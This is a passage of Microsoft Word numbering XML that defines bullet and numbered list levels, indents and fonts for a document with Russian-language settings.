    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7903" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8950" w:hanging="543"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="48" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="11F21892"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE3E20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3625131"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F132C2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137F1C39"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FADC67C8"/>
    <w:lvl w:ilvl="0" w:tplc="053E81A8">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7CA41F22">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="526" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B53EB4AC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="872" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C950AB3A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1218" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4DB0B8D8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1564" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E26CC534">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1911" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CD9438AA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2257" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2520C9C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2603" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8CFC2058">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2949" w:hanging="295"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="51" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="13A2507D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="452CF4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13E32B93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFDA315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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="14AD625F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9D52F85C"/>
    <w:lvl w:ilvl="0" w:tplc="87A42842">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
        <w:spacing w:val="-18"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FCAAC00E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="91C0EAC4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0DEEC758">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="032E7966">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="BA7A5C0C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C67E48D6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9D344094">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F10AC6DE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="54" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="16237F04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF0A3854"/>
    <w:lvl w:ilvl="0" w:tplc="4BD476C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
        <w:i w:val="0"/>
        <w:color w:val="8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16544F3B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CC6E3082"/>
    <w:lvl w:ilvl="0" w:tplc="E7FC6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168224DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BCAC7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16917051"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D0EC6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96975B3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="38740BDC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="235"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="59" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1BAF4B03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0534F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DB975FE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F63E6592"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="6"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:legacy w:legacy="1" w:legacySpace="0" w:legacyIndent="250"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="61" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E334953"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="900ED0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1E4318B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85302408"/>
    <w:lvl w:ilvl="0" w:tplc="DCC89F7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1191"/>
        </w:tabs>
        <w:ind w:left="1191" w:hanging="765"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E34090D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1506"/>
        </w:tabs>
        <w:ind w:left="1506" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:r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63" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1EB9679F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F934025A"/>
    <w:lvl w:ilvl="0" w:tplc="77706D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1ED33E71"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="571E8182"/>
    <w:lvl w:ilvl="0" w:tplc="E34090D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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F16550C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DD6C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0935CD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7DC0794"/>
    <w:lvl w:ilvl="0" w:tplc="8A06949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12C42B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="624C7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2181F20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5770D3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Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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27215C2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C1AC8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2955DF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6FD0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29602FE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95046842"/>
    <w:lvl w:ilvl="0" w:tplc="F09655CA">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72" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="24946AB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03D670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252C4ABB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77EC18DA"/>
    <w:lvl w:ilvl="0" w:tplc="B29EF42E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="160" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="102"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4CE685E2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1248" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A4FCEC02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2337" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="CBEE0874">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3425" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8DDA6E30">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4514" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="90B05728">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5602" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EA9E7116">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6691" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DC903D98">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7779" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="415A74D4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8868" w:hanging="338"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="74" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="273C650B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BA2B772"/>
    <w:lvl w:ilvl="0" w:tplc="7F729CE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79A7A5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D92E70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27D834EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="93F4A5EC"/>
    <w:lvl w:ilvl="0" w:tplc="2ABAA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28477224"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="458EDBF0"/>
    <w:lvl w:ilvl="0" w:tplc="2EB090E6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="-5"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6C1E4D76">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F5C07D36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="10841A02">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0CEC1B84">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="EC8E98C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="07AED916">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="99B669E8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5D36615E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="78" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="289E7887"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53683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9C3681C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A572B0B2"/>
    <w:lvl w:ilvl="0" w:tplc="23A0221A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="-6"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="CAD62416">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D33C4198">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E9F85A8C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="46582AA6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A754AFCC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5354" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="9BFC7A64">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6401" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="AC1072C0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7448" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="938269E4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8495" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="80" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="29F605B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A8FC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A6474E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="269A6076"/>
    <w:lvl w:ilvl="0" w:tplc="E34090D0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E34090D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2B19180A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE16CAE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B56401B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6523484"/>
    <w:lvl w:ilvl="0" w:tplc="1EC6FABE">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="120" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
        <w:spacing w:val="-30"/>
        <w:w w:val="99"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0A2C9416">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1166" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8AA2D378">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2213" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1DB4EBE2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C8BED134">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4307" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="400A11B0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
